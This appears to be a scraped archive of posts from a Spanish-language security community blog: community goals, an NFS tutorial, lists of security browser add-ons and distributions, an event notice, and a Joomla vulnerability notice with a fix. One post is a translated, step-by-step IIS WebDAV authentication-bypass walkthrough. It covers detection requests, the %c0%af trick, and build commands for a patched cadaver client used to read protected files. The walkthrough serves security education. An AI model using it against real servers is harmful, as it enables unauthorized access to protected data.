Propósitos para el 2009 de La Comunidad DragonJAR

• Publicar nuevo numero de nuestra ezine
  Publicamos en el 2009 la 4ta edición de la E-zine Comunidad DragonJAR , desde esta edición epsilon77 decide dejar la dirección de la ezine, para darle el espacio a Seifreed quien ahora tomara las riendas de nuestra revista y con quien esperamos mejorar el nivel del contenido y la regularidad con que publicamos nuevos números.

• Oficializar la Emisora en Temas de Seguridad
  Dejamos a un lado las tertulias, la música y los podcast de otros para nutrir nuestra radio con contenido propio de calidad. (faltan algunos contenidos por subir que ya fueron realizados)

• Elaborar la constancia y nivel técnico de los laboratorios
  Gracias a 4v4t4r los laboratorios presenciales y virtuales,  fueron subiendo gradualmente el nivel técnico y la regularidad de publicación, en el 2009 también vimos el nacimiento de sec-track, un proyecto colaborativo que ofrece un repositorio de recursos relacionados con la implementación y desarrollo de laboratorios  de entrenamiento e investigación sobre Seguridad Informática.

• Realización de cursos básicos de nivelación
  Desde el foro de nuestra comunidad y en especial en el subforo de Principiantes fomentamos la realización de vídeo tutoriales y guías básicas paso a paso con el fin de nivelar nuestros usuarios y todos hablemos un mismo idioma.

• Publicar mejor contenido en la web y mas periódicamente
  Mas que un propósito para un año especifico, es un compromiso constante el ofrecerle a todos nuestros usuarios y visitantes contenido de calidad en nuestra comunidad, aunque pueden pasar algunos días sin actualizar siempre nos “ponemos al día” y con buen contenido.

• Tener representación en eventos como Campus Party, Flisol, Congresos
• Como siempre nuestra comunidad se deja ver en todos los eventos relacionados con la seguridad informática y el 2009 nueve no fue la excepción, nuestra comunidad resalto en la campus party no solo en la parte académica sino también como comunidad integradora realizando la primera DragoN Party un evento que reunió las diferentes comunidades tecnológicas de colombianas; En la primera la primera BarCamp realizada en Medellín la comunidad contó con dos(DragoN y 4v4t4r) ponentes cuyas “desconferencias” tuvieron una gran acogida.

  En el FLISOL, la comunidad contó con grandes representantes en los comités organizadores de las principales ciudades y ponentes con charlas como Seguridad Informática con Software Libre; En el EISI (Encuentro Internacional de Seguridad Informática), el mejor evento de seguridad realizado en Colombia, la comunidad contó con una excelente representación, mas de 70 dragonautas asistieron al evento, contamos con 3 ponentes y nos ganamos el wargame.

• Realizar nuestra distribución “Drux” basada en GNU Linux
  La realización del Drux fue el propósito no realizado del 2009, aunque se recuperaron algunos recursos viejos, se discutió sobre los paquetes, se crearon grupos de trabajos, se creó una wiki para documento, aun no tenemos un alpha del drux que mostrar del Drux y es el propósito que nos falto cumplir para este año.

Con este buen balance dejado en el 2009, voy a exponer nuestros propósitos para el año 2010:

• Con la ayuda de Seifreed y todo el Staff de nuestra ezine, publicar mas frecuentemente y con mejor calidad nuestra revista electrónica.
• Crear nuestro vídeo podcast, un programa en vídeo donde hablaremos sobre temas de seguridad informática e integremos la radio y el contenido multimedia generado por nuestra comunidad en un solo lugar.
• Retomar los laboratorios de nuestra comunidad y convertirlo en un espacio donde cualquier integrante de nuestra comunidad pueda publicar sus laboratorios, experimentos, pruebas, todo esto en el ámbito de la seguridad informática.
• Contar con un equipo de editores calificados para que los visitantes y dragonautas encuentren siempre contenidos de calidad cuando visiten nuestro portal.
• Realizar el wargame de la campus party colombia 2010, nuestra segunda dragon party (con aun mas acogida), contar cada vez con mas representación en calidad de ponentes en los diferentes eventos relacionados a la seguridad informática en nuestro país y el exterior.
• Cambiar el logotipo (ayudanos a escoger) y el diseño de nuestros sitios.
• Realizar nuestra distribución “Drux” basada en GNU Linux

Como algo personal me gustaría GANAR un premio este año, en el 2009 estuve cerca de ganar dos, pero en ambas ocasiones ocupe el segundo puesto, en el 2010 si los ganare

Esperamos este año poder cumplir con TODOS nuestros propósitos, recuerda que la comunidad y los proyectos en conjunto prometen y comprometen trabajo constante que solo serán posibles realizar si trabajamos en equipo.

También puede interesarte...

• Ezine Comunidad DragonJAR Online
• Nuestros propósitos para el 2009
• COMBAT Training v2.0 en Colombia
• Boletín de La Comunidad DragonJAR #0008
• Confirmado el COMBAT Training en Colombia
• Boletín de La Comunidad DragonJAR #0007
• Finaliza plazo para la entrega de los Informes
• Nuevo Plazo de Entrega para el Reto Forense

Algunas de las vulnerabilidades encontradas en este modulo de joomla son:

1. Log’s Poisoning
2. Massive Mail Sending
3. Visible Log’s
4. XSS
5. Email Bombing
6. LFI
7. y muchas mas

Podemos ver un vídeo donde se explota algunas de las vulnerabilidades de este modulo de Joomla

La misma gente del Centro de Estudios Superiores en Alta Tecnologia ha publicado un parche temporal para solucionar estos fallos de seguridad, solo es necesario crear .htacces en la carpeta donde se ubica el archivo quickQuestionLog.txt, con el siguiente contenido:

RewriteCond %{REQUEST_URI} ^(quickQuestionLog.txt) [NC]
RewriteRule ^.*$ - [F,L]

y colocar el siguiente código al inicio del archivo mod_quick_question_sendform.php:

foreach($_REQUEST as $key => $value) $_REQUEST[$key] = htmlentities($value);

Puedes descargar una prueba de concepto y el full advisory de aqui.

Mas Información:
CCAT Research Lab`s – Advisor No. 2
Post en el foro

También puede interesarte...

• Multiples Vulnerabilidades en SMF
• XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2
• WordPress 2.6.3 vulnerable a Cross Site Scripting
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• Vulnerabilidad 0-day en todas las versiones de Windows
• Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash
• ¿Que Mirar Cuando Auditamos una Base de Datos Oracle?
• XSS que permite postear a atacante registrado en WordPress

En el episodio #400 de LemonTV donde hablan sobre las medidas a tener en cuenta frente a los spyware,  Lucas y Facundo han realizado una pequeña reseña sobre la comunidad (minuto 2:29) donde recomiendan dragonjar.org a los  novatos y “entusiastas” de la seguridad informática, aquí les dejo el episodio completo no sin antes recomendarles que visisten LemonTV.tv.

Muchas Gracias por la mención y por el trabajo que realizan al acercar la tecnología a todos.

También puede interesarte...

• Memorias del DISI 2009
• Boletín de La Comunidad DragonJAR #0008
• Boletín de La Comunidad DragonJAR #0007
• Video: Explotando WM Downloader
• Vídeo: Introducción al Metasploit Framework
• Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)
• Boletín de La Comunidad DragonJAR #0006
• Boletín de La Comunidad DragonJAR #0005

En mi hogar tengo dos equipos (laptop y escritorio) ambos con la meta-distribución Gentoo Linux instalada. Suelo utilizar el PC de Escritorio para almacenamiento por lo tanto ahí alojo gran parte de mi información. Necesito estar accediendo constántemente a este equipo para compartir/modificar los datos que tengo. Gracias a NFS puedo disponer de ellos como si de una carpeta más de mi sistema se tratara… veamos cómo podemos hacer uso de este protocolo para hacer más fácil nuestra vida

NFS (Network File System) es un protocolo de sistema de archivos en red desarrollado originalmente por Sun Microsystems en 1984, permitiéndole a un usuario en una máquina cliente acceder a los archivos en la red como si lo estuviera haciendo localmente. Es ampliamente usado en sistemas UNiX-like aunque también puede ser utilizado bajo plataformas Windows, Mac OS, Novell NetWare, entre otros.

El proceso se llevará acabo como mencioné anteriormente haciendo uso de máquinas con GNU/Linux. En caso de que quieras disponer de un cliente NFS bajo una plataforma Windows, puedes consultar los enlaces que se encuentran al final del post.

1. Habilitando el soporte para NFS en el kernel

NFS es tratado como un sistema de archivos más en el núclo del sistema (así como ext3, ext4, ReiserFS…) , por lo tanto debes activar el soporte en el mismo. En caso de que estés utilizando distribuciones como Ubuntu, Debian, Fedora, Arch y un gran etcétera lo más probable es que ya se encuentre activado por defecto este sistema de archivos. En caso de que uses Gentoo ó configures tus propios núcleos:

Servidor:

File Systems  --->
  [*] Network File Systems  --->
    <*> NFS server support
      [*]   NFS server support for NFS version 3
      [ ]     NFS server support for the NFSv3 ACL protocol extension
      [ ]   NFS server support for NFS version 4 (EXPERIMENTAL)

Cliente:

File Systems  --->
  [*] Network File Systems  --->
    <*>   NFS client support
      [*]    NFS client support for NFS version 3
      [ ]    NFS client support for the NFSv3 ACL protocol extension
      [ ]    NFS client support for NFS version 4 (EXPERIMENTAL)

Después de haber configurado, lo de siempre, compilar instalar: make && make modules_install

2. Instalar las utilidades para el espacio de usuario

Ahora que ya tenemos activado el soporte en nuestro núcleo, debemos instalar las herramientas que nos permitirán hacer uso de este protocolo en nuestra distribución:

• Cliente Ubuntu/Debian:

aptitude install nfs-kernel-server nfs-common portmap

• Servidor Ubuntu/Debian:

aptitude install nfs-kernel-server nfs-common portmap

• Fedora:

yum -y install system-config-nfs

• ArchLinux:

pacman -S nfs-utils

• Gentoo:

emerge -av nfs-utils

En general, para cualquier distribución es el mismo proceso, excepto que en algunas se cuenta con utilidades gráficas que facilitan la configuración (por ejemplo Fedora). Como mencioné anteriormente lo haré desde Gentoo pero casi la totalidad del texto te servirá.

Empezaremos configurando el servidor.

Para compartir un determinado directorio debemos editar el archivo /etc/exports. Ahí es donde se encuentra la información referente a los datos que se deben compartir y sus respectivos permisos. En mi caso quiero compartir dos particiones que tengo en el desktop: Warez y Stuff (particiones NTFS), así que primero deben estar montadas.

mount -t ntfs-3g /dev/sda2 /media/Warez
mount -t ntfs-3g /dev/sda3 /media/Stuff

Es recomendable automatizar un poco el proceso agregando las entradas necesarias a /etc/fstab. La dirección IP estática que tiene asignada mi laptop es: 192.168.1.178. Quiero que únicamente esta dirección IP tenga acceso a estos datos, así que edito el archivo /etc/exports y agrego las siguientes líneas:

/media/Stuff 192.168.1.178/255.0.0.0(async,rw,no_subtree_check)
/media/Warez 192.168.1.178/255.0.0.0(async,rw,no_subtree_check)

Expliquemos un poco la estructura:

• /media/Stuff: Es el directorio que quiero compartir. En caso de que quisieras compartir tu home simplemente reemplaza por /home/usuario ó lo que sea.
• 192.168.1.178/255.255.255.0: Aquí estoy especificando la dirección IP que puede tener acceso a estos datos. En caso de que quieras compartir con cualquier equipo en la red bastaría con reemplazar la primera IP y por 192.168.0.0.
• (async,rw,no_subtree_check): Estos son los parametros bajo los que se debe realizar la compartición. Veamos algunos de lo más usados e importantes:
  • rw: Permite lectura y escritura.
  • ro: Permite sólo lectura en el directorio.
  • async: Responde los pedidos antes de ser realizados. ES IMPORTANTE hacer uso de este parámetro ya que aumenta el rendimiento y evita que ocurran cosas como que el disco se llene en mitad de envío ya que primero hace las comprobaciones necesarias y después las ejecuta.
  • no_subtree_check: Deshabilita el chequeo del subárbol. Es recomendado al compartir directorios que cambien constántemente como /home. Más información man exports.
  • Estas son las más esenciales, para profundizar un poco puedes mirar aquí.

Guardamos el archivo e iniciamos el demonio para empezar a compartir nuestros archivos:

/etc/init.d/nfs start

En caso de que quieras que se inicie automáticamente en cada arranque del sistema (Gentoo):

rc-update add nfs boot

Y con esto terminamos de configurar el servidor.

Vamos ahora del lado del cliente.

Esta es la parte más sencilla de todas ya que simplemente basta con montar el directorio como si de una partición más se tratara. Quiero que los datos compartidos por NFS se encuentren en /mnt así que primero creo las carpetas:

mkdir -p /mnt/{Stuff,Warez}

Hecho esto procedo a montar las particiones:

mount 192.168.1.86:/media/Stuff /mnt/Stuff
mount 192.168.1.86:/media/Warez /mnt/Warez

¡Eso es todo! Ahora podemos acceder al directorio que hayamos asignado en nuestro sistema con los permisos que hayamos establecido

A veces resulta bastante engorroso tener que estar ejecutando el anterior comando cada vez que queramos acceder a los datos. Podemos agilizar el proceso agregando una línea al archivo /etc/fstab:

192.168.1.86:/media/Stuff /mnt/Stuff nfs defaults,noauto,rsize=32768,wsize=32768 0 0

De esta manera para acceder a la carpeta en el servidor basta con ejecutar:

mount /mnt/Stuff

Y listo. Agregué la opción noauto para que no se monte automáticamente la partición ya que puede que el equipo servidor no se encuentre encendido ó no accedas muy frecuentemente a ella.

Y como diría mi compañero: ¡Eso es todo amigos¡

Enlaces complementarios:

• Instalar el cliente para NFS en Windows para una migración de UNiX a Windows
• Servidor NFS bajo Ubuntu
• Setting up a Fedora NFS Server
• NFS – Gentoo Linux Wiki
• NFS – ArchWiki
• man exports

También puede interesarte...

• Nuevo Plazo de Entrega para el Reto Forense
• Bug en WordPress 2.5.1
• Google libera el Manual de Seguridad para el Navegador
• Boletín de La Comunidad DragonJAR #0003
• Memorias del Flisol 2008
• Fotos y Videos fotos de Carolina Cruz
• Guarda las Conversaciones de MSN Messenger, Yahoo! Messenger, Pidgin Skype, etc..
• Abrir Puertos del Siemens Gigaset SE 461 WiMax de Orbitel ( UNE )

Continuando con la colección de extensiones Firefox imprescindibles para mejorar nuestra navegación, veremos hoy algunas de las mejores enfocadas a la seguridad en la red. Ayer veíamos addons sobre Privacidad, pero como resalté anteriormente la privacidad es sólo uno de los tantos aspectos de los que debemos preocuparnos al utilizar Internet. Lastimósamente, la red está plagada de Malware y no sólo tener un buen antivirus y un firewall te mantendrá protegido (aunque si ayudan) ya que en la mayoría de los casos la desinformación del usuario (capa 8 ) es la responsable de la no filtración del contenido al que accede.

Quizás la herramienta más usada a diario es nuestro navegador Web por este motivo es muy importante tener un balance entre usabilidad/seguridad para posiblemente ahorrarnos más de un dolor de cabeza.

AI Roboform Toolbar for Firefox: Funciona como barra de herramientas con RoboForm para administrar y proteger tus contraseñas.

Dr.Web anti-virus link checker: Verifica que los archivos no tenga virus antes de descargarlos, lo mismo para los sitios web.

FirePhish Anti-Phishing Extension / iTrustPage / Personal Anti-Phishing Sidebar / PhishTank SiteChecker: Extensiones que te permiten estar alerta sobre el ingreso a un sitio web con contenido falsificado (Phising) haciendo uso de bases de datos que contienen URLs identificadas de este tipo.

FormFox: Al poner el cursos sobre un formulario, te muestra haciendo donde vá la información que estás escribiendo.

KeyScrambler Personal: Encripta lo que escribes para protegerte de keyloggers.

Link Alert: Cambia el color de tu cursor para indicar visualmente lo que hace el link que estás apuntando.

Magic Password Generator: Haciendo uso de una contraseña maestra genera contraseñas únicas para cada sitio. También auto-rellena direcciones de correo electrónico y nombre.

NoScript: 100% RECOMENDADA. Bloquea cualquier código malicioso de páginas que no estén en la lista blanca de sitios en los cuales usted confía. Más información sobre NoScript aquí.

Password Exporter: Permite importar y exportar tus contraseñas entre diferentes copias de Firefox.

Password Hasher: Genera automáticamente contraseñas fuertes, permite actualizarlas y cambiarlas mucho más rápido.

PasswordMaker: Ayuda a encriptar y almacenar las contraseñas.

PopupMaster: – Agrega un bloqueador de popups a la barra de estado.

QArchive.org web files checker: – Instálalo y con un simple clic derecho puedes realizar un escaneo de malware, virus, troyanos, etc. antes de descargar.

QuickJava: – Dá la posibilidad de activar/desactivar Java por medio de un botón.

Secure Login: – Almacena información de login y llena los formularios con un clic.

SecurePassword Generator: – Generador de contraseñas fuertes.

SignupShield Passwords: – Administrador de contraseñas (1-Click), rellena formularios, tiene control anti-spam y anti-phising.

SplitLink: – Elimina símbolos especiales en las URLs para que puedas saber mejor hacia que

VeriSign EV Green Bar Extension: – Verifica la información de los certificados seguros y pone la barra de direcciones de color verde para hacértelo saber.

FireGPG: Sugerida por mi amigo Vierito. Esta extensión provee una interfaz para encriptar, desencriptar, firmar o verificar la firma de algún sitio web usando GnuPG.

Y tú, ¿Que otra extensión usas?

También puede interesarte...

• Las mejores extensiones de Firefox para mejorar tu privacidad
• Infección Virus a través de Redes Sociales
• NoScript
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• Top 10 Técnicas de Seguridad Web en el 2009
• XSS que permite postear a atacante registrado en WordPress
• Tercer Encuentro Internacional de Seguridad Informática – Día III
• Damn Vulnerable Web App

En este post vamos a enfocarnos en el repaso de algunas de las mejores distribuciones enfocadas a la Seguridad Informática.

1. BackTrack

Sería algo imposible escribir una lista de distribuciones enfocadas a la Seguridad sin hacer mención de Backtrack. Si eres lector asiduo del blog seguramente ya la conoces, 4v4t4r ha realizado muchos laboratorios haciendo uso de esta distro. La última versión disponible (a la hora de escribir el artículo) es la 4 BETA. Con más de 300 herramientas que la convierte en la distribución preferida por los pentesters. Actualmente basada en Debian/Ubuntu con unos amplios repositorios que permiten extender aún más su funcionalidad. Tanto en este blog como en el de los Laboratorios DragonJAR encontrarás mucha información sobre el uso de esta distribución.

Descargar Backtrack

2. nUbuntu (Network Ubuntu)

Como su nombre lo indica basada en Ubuntu Linux y usa el escritorio Fluxbox. Su objetivo es tener una distribución Linux basada en Ubuntu, personalizada, agregando las herramientas necesarias para realizar pruebas de penetración en servidores y redes; eliminando también aplicaciones que no sean necesarias para este propósito.

Descargar nUbuntu

3. OWASP Live CD

Es una Live-CD que reune algunas de las mejores herramientas open source de seguridad en un sólo lugar. Contiene también documentación y ambientes interactivos de aprendizaje (como WebGoat) promoviendo así la educación en el campo de la Seguridad Web. Para quienes no lo sabía OWASP (acrónimo de Open Web Application Security Project) es un proyecto de código abierto dedicado a determinar y combatir las causas que hacen que el software sea inseguro. En el blog encontrarás mucha información sobre este proyecto.

Descargar OWASP Live CD

4. Samurai Web Testing Framework

Distribución Live preconfigurada para el pentesting de aplicaciones Web. Incluye muchas herramientas que permiten llevar a cabo fácilmente los 4 pasos básicos en un test de penetración web: Reconocimiento, Mapeo, Descubrimiento, Explotación. Además incluye una Wiki que permite almacenar la información recolectada durante el pentesting. En el blog encuentras más información sobre esta Live-CD.

Descargar Samurai Web Testing Framework

5. Network Security Toolkit

Basada en Fedora, actualmente se encuentra en la versión 1.8.1. Su objetivo es proveer a los administradores de red un completo set de herramientas de seguridad open source. Contiene una gran parte de la lista de las 100 mejores herramientas de seguridad creada por Insecure. Lo fascinante es que permite convertir un PC cualquiera en un sistema diseñado para el análisis de tráfico de red, IDS, monitor de redes inalámbricas, entre otros usos. También util en muchos escenarios para la recuperación de daños.

Descargar NST

Hay muchas distribuciones Linux enfocadas a las auditorías de seguridad, no las menciono en el post debido a que muchas de ellas ya han sido abandonada por sus desarrolladores y no volvieron a lanzar ninguna actualización ni versiones nuevas. De cualquier manera, si interesa conocer algunas de ellas aquí tienes una lista:

• Pentoo
• Knoppix STD
• Notably Auditor
• Phlak

Por nombrar algunas… Y tu, ¿Que otra distribución usas para este propósito?

También puede interesarte...

• Varias Distribuciones Live CD de Seguridad en un DVD
• X.25 Conferencia de Seguridad Informática en Mexico
• Memoria USB Booteable con Varias Distribuciones de Seguridad Informática
• PentBox – Una suite de seguridad y pentesting en ruby
• Curso en el Sena Virtual sobre Auditoria en Seguridad
• Dradis, organiza y comparte información en un Test de Penetración
• Bloqueo de sitios Web usando el archivo HOSTS
• Laboratorios Hacking – Técnicas y contramedidas

El próximo Sábado, 6 de Junio se desarrollará en la ciudad de Medellín el BarCamp, un evento que reune entusiatas cibernautas para hablar por medio de des-conferencias sobre temas relacionados con Internet; se discutirá sobre Desarrollo/Diseño Web, Software Libre, E-Marketing, Redes sociales, Seguridad Informática, y un largo etcétera.

Como siempre la Comunidad DragonJAR estará presente en el evento, tanto en la parte logística como en el área de las des-conferencias.

En la parte logística del evento me encontraré yo (Cortex) orientando a los asistentes y colaborando con la realización del mismo. Por el lado de las des-conferencias, habrán 3:

• Phishing, ¿Qué es?, ¿Cómo Protegerse? y Casos con Bancos Colombianos – Por DragoN
• Amenazas y Protección de Datos en las Nuevas Tecnologías – Por 4v4t4r
• !Seguridad en Joomla¡ ¿Mito o Realidad? – Por Bi0virus

Habrán muchísimas más des-conferencias, menciono algunas:

• Streaming Libre, Streaming para todos
• Bases para iniciar un negocio por internet
• OpenOffice.org 3.1: Entrenamiento en Linea y Tiempo Real
• Saquémosle plata al grande (Google)
• 70 tecnologias de actualidad
• Mírame mamá, estoy triunfando! (en Internet)
• Plataformas E-learning: Nuevo paradigma en la esfera educativa
• Linux en la Educación: “Socialmente Justo” “Tecnológicamente Justo” “Económicamente Viable”
• El Diserrollador: la nueva especie de trabajador web
• Muchas más!

El evento vá dirigido a todo tipo de personas, desde Expertos hasta el público general que sólo le gustaría conocer más sobre las tecnologías que se cuecen en la red.

Un evento de una gran magnitud, en el que todos nos congregaremos para hacer culto a la red. Sobra decir que la entrada es completamente gratuita y que todo el que quiera asistir, puede hacerlo libremente. Las des-conferencias se realizarán entre las 9:00am y 5:00pm en el Parque Explora.

¡Invitamos a todos nuestros visitantes a que se hagan presentes y podamos compartir un rato agradable hablando de tecnología!

Enlaces

• BarCamp Medellín 2009
• Programación de las Des-conferencias

También puede interesarte...

• Seguridad Informática con Software Libre
• OLPC y Sugar en Colombia
• Crónica sobre BarCamp Medellín 2009
• SeguriSemanal II
• Antesala de BarCamp Medellín 2009
• Análisis del Fallo en el Generador de Números Aleatorios de OpenSSL/Debian
• COMBAT Training v2.0 en Colombia
• El futuro de la industria de la Seguridad Informática

El artículo se encuentra en Inglés pero he decidido realizar la traducción para que nuestro público hispano también pueda tener acceso a este buen contenido. Se hace uso de la herramienta Nmap para detectar si el servidor es vulnerable y luego por medio de una versión de cadaver parcheada se realiza la explotación.

Detección de WebDAV, verificación de la vulnerabilidad y explotación

La primera cosa que deberías saber al jugar con esta vulnerabilidad es que el servidor IIS no es explotable sí el directorio raiz está protegido. También si el directorio raiz está protegido, no hay manera de determinar ni siquiera si WebDAV está activado. Siendo dicho eso, si el directorio raiz _no_ está protegido entonces es hora de divertirnos un poco.

Detectando sí WebDAV está activado

Las pruebas han sido realizadas en:

• IIS 6.0/Windows 2003 Enterprise SP2
• IIS 5.1/Windows XP Pro SP2
• IIS 5.0/Windows 2000 SP4

En IIS 6-.0, WebDAV está desactivado por defecto. En IIS 5.0 y 5.1, WebDAV está activado por defecto y se debe editar el registro para desactivarlo.

Mi método de detección simplista requiere de ejecutar una petición PROPFIND en el servidor. Básicamente es la misma petición PROPFIND usada en el script http-iis-webdav-vuln.nse:

PROPFIND / HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/xml
Content-Length: 298

<?xml version=”1.0″ encoding=”utf-8″?>
<propfind xmlns=”DAV:”>
<prop>
<getcontentlength xmlns=”DAV:”/>
<getlastmodified xmlns=”DAV:”/>
<executable xmlns=”http://apache.org/dav/props/”/>
<resourcetype xmlns=”DAV:”/>
<checked-in xmlns=”DAV:”/>
<checked-out xmlns=”DAV:”/>
</prop>
</propfind>

Cuando WebDAV está activado, debería devolver “HTTP/1.1 207 Multi-Status”.
Cuando WebDAV ha sido desactivado, debería retornar “HTTP/1.1 501 Not Supported”.

Éste es el método que he implementado en el script http-iis-webdav-vuln.nse. Funciona muy bien en el laboratorio con los servidores IIS. Si recibimos alguna otra cosa diferente a 207 o 501 entonces abordamos el barco diciendo que el servidor no está soportado. Por otrolado, un servidor Aparche corriendo sobre Ubuntu devolvería un 405 Method Not Allowed.

Verificando si un servidor es vulnerable

Las pruebas han sido realizadas en:

• IIS 6.0/Windows 2003 Enterprise SP2
• IIS 5.1/Windows XP Pro SP2

No funciona en:

• IIS 5.0/Windows 2000 SP4

El script original sólo usaba un forma para verificar; primero encontraría un directorio protegido (/secret/) y luego probaría intentando el caracter %c0%af después del primer /. Entonces /secret/ se convertiría en /%c0%afsecret/.

Funcionó muy bien en IIS 6.0 pero no funcionó del todo en IIS 5.0/5.1. Después jugar un poco más hoy con esto, logramos hacerlo funcionar en IIS 5.1. El problema con el 5.1 es que el caracter %c0%af no puede estar justo antes de / pero sí en alguna parte entre el nombre del directorio. También funcionó en IIS 6.0. Modifiqué el script de manera que usara la verificación de IIS 5.0/6.0, convirtiendo /secret/ en /s%c0%afecret/.

Encontrando un servidor vulnerable

Las pruebas han sido realizadas en:

• IIS 6.0/Windows 2003 Enterprise SP2
• IIS 5.1/Windows XP Pro SP2

No funciona en:

• IIS 5.0/Windows 2000 SP4

Ahora vamos a la parte divertida. Si hasta ahora no te has divertido, vete preparando por que ya casi llegamos!

Lo primero que necesitamos hacer es encontrar un servidor vulnerable. Sólo llegué a saber de un Windows 2003 en mi laboratorio corriendo IIS 6.0 que es vulnerable (actualizado y parcheado hasta la fecha). Veamos funciona como un escaneo con nmap en este sistema con el script actualizado:

> ./nmap -T4 -p80 –script=http-iis-webdav-vuln xxx.xxx.xxx.xxx

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDT
Interesting ports on xxx.xxx.xxx.xxx:
PORT   STATE SERVICE
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdav

Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds

Interesante! Ahora sabemos que el servidor tiene WebDAV activado y hay 3 directorios vulnerables.

Explotándolo!

Ahora podríamos hacer lo que sea haciendo uso de telnet por el puerto 80, pero no es muy divertido (creeme, es muy tedioso!) así que busqué un cliente WebDAV. Me tropecé con un software libre llamado cadaver, y basado únicamente en el nombre lo descargué. Cadaver por sí mismo es un gran cliente WebDAV de línea de comandos pero rápidamente me dí cuenta que tiene un montón de problemas que no nos dejarían hacer lo que queríamos. Lo bueno del software libre es que es abierto, así que descargué el código fuente de cadaver-0.23.2 y después de modificarlo un poco, resultamos con un pequeño parche que hace bastante sencillo explotar un servidor. Revisa el parche por ti mismo para ver detalles a fondo pero básicamente hace lo siguiente:

1. Reemplazar cualquier cabecera “Depth: 0″ por “Depth: 1″ (de otro modo LS no funcionaría)
2. Agregar la cabecera “Translate: f” a cada petición (de otra manera GET y probablemente otros no funcionarían.
3. Insertar los caracteres “%c0%af” en cualquier petición con más de 1 caracter.

Así que baja el parche cadaver-0.23.2-h4x.patch y apĺícalo a la fuentes de cadaver-0.23.2 desde el sitio web de cadaver. Aquí están los comandos:


> mkdir cadaver-h4x
> cd cadaver-h4x
> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
–recortado–
> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
–recortado–
> tar xzvf cadaver-0.23.2.tar.gz
–recortado–
> cd cadaver-0.23.2/
> patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
> ./configure
–recortado–
> make
–recortado–

Ahora deberíamos de tener una versión parcheada y compilada de cadaver. Iníciala con el servidor que habías identificado con directorios vulnerables anteriormente:

> ./cadaver xxx.xxx.xxx.xxx

Esto debería de dejarte en un prompt con “dav:/>”. Ahora simplemente haz cd al directorio vulnerable y verifica que hay ahí:


dav:/> cd secret
dav:/secret/> ls
Listing collection `/secret/’: succeeded.
password.txt                           7  May 19 10:40
dav:/secret/> cat password.txt
Displaying `/secret/password.txt’:
ron$pr0ns
dav:/secret/>

Y ahí lo tienes!

Aquí tienes una lista de comandos que he probado y funcionan con cadaver parcheado en un directorio vulnerable:

• CD
• LS
• MOVE
• PUT
• GET
• CAT
• DELETE

Curiosamente, el comando COPY no funciona. No hemos tenido tiempo para investigar por, pero la funcionalidad puede ser duplicada con un get/local rename/put.

Este cadaver parcheado tampoco funcionará para examinar directorios WebDAV regulares (no vulnerables), así que no intentes.

También puede interesarte...

• Video: Explotando WM Downloader
• Vulnerabilidad 0-day en todas las versiones de Windows
• Parches para Windows que corrigen Vulnerabilidades Criticas
• Denegacion de Servicio desde el WordPad
• Actualiza tu equipo con Windows
• Video Tutorial de Nessus y Baseline Security Analyzer
• Microsoft Publica parche que corrige Vulnerabilidad “Critica”
• Recogiendo Evidencias para Análisis Forense en Windows

La comunidad y los proyectos en conjunto prometen y comprometen trabajo constante que solo serán posibles realizar si trabajamos en equipo.

Pretendemos realizar excelentes propuestas y propósitos en este nuevo año. Entre ellas se destaca la realización de nuestra propia distribución basada en GNU/Linux “DruX”. (Más información y modos colaboración en el proyecto DruX). Así mismo se espera publicar algunos números más de la bien recibida E-Zine de nuestra comunidad (Más información y modos de colaboración en el proyecto E-Zine DragonJAR).

Se pretende además darle el enfoque y sello oficial de la comunidad a la Emisora DragonJAR, en la cual muy pronto comenzarán las transmisiones de programas propios realizados por varios usuarios de la comunidad. (Más información y modos de colaboración en el proyecto Radio DragonJAR)

Los Laboratorios también presentarán mejoras, tanto en su constancia como en su nivel técnico, pues una vez nivelados en conocimiento todos los participantes se espera realizar algunos más complejos que motiven el seguimiento de los mismos y la realización de otros laboratorios propuestos por los participantes y lectores.
Pretendemos realizar algunos laboratorios presenciales en diferentes ciudades de Colombia, todo esto gracias a varios acuerdos con Universidades y organizaciones interesadas en los mismos. Así mismo esperamos realizar con mayor periodicidad los laboratorios en modo virtual, para que los usuarios e interesados de otros paises puedan ser participes de estos. (Más información y modos de colaboración en el proyecto Labs.DragonJAR.org)

Se espera además realizar algunos cursos básicos de nivelación en diferentes temas relacionados con los sistemas de información y la seguridad informática, todos ellos serán llevados a cabo sobre entornos de salones virtuales, buscando una mayor cobertura y sanar el vacio que muchos usuarios presentan frente a algunos aspectos básicos sobre estos temas. (Más información y modos de colaboración en el proyecto cursos básicos TIC)

Estos son solo algunos de los proyectos a realizar como comunidad puedes enterarte de otros (Wiki, Canal de TV, Conferencias) participando en el foro de la comunidad.

A nivel personal esperamos trabajar y estudiar aun más para mejor tanto a nivel profesional como a nivel de comunidad, esperamos publicar mejor contenido en la Web y hacerlo más periodicamente. Esperamos viajar a más ciudades a diferentes eventos que nos interesan (Campus Party, Flisol, Conferencias, etc).
Esperamos que el 2009 sea un año para recordar en la Comunidad DragonJAR.

Y para finalizar, ¿Cuáles son tus propósitos para este nuevo año 2009?

También puede interesarte...

• Ezine Comunidad DragonJAR Online
• Nuestros propósitos para el 2010
• COMBAT Training v2.0 en Colombia
• Boletín de La Comunidad DragonJAR #0008
• Confirmado el COMBAT Training en Colombia
• Boletín de La Comunidad DragonJAR #0007
• Finaliza plazo para la entrega de los Informes
• Nuevo Plazo de Entrega para el Reto Forense

Aunque ya existían instrucciones para descargar la versión beta del Service Pack 2 para windows vista, solo ahora Microsoft a publicado el esta beta para todos los usuarios.

El Service Pack 2 beta mejora el sistema para creación de redes inalámbricas, la nueva versión de Windows Search 4.0, ahora es posible grabar BluRay en Windows Vista sin necesidad de software adicional, soporte para la nueva versión de BlueTooth.

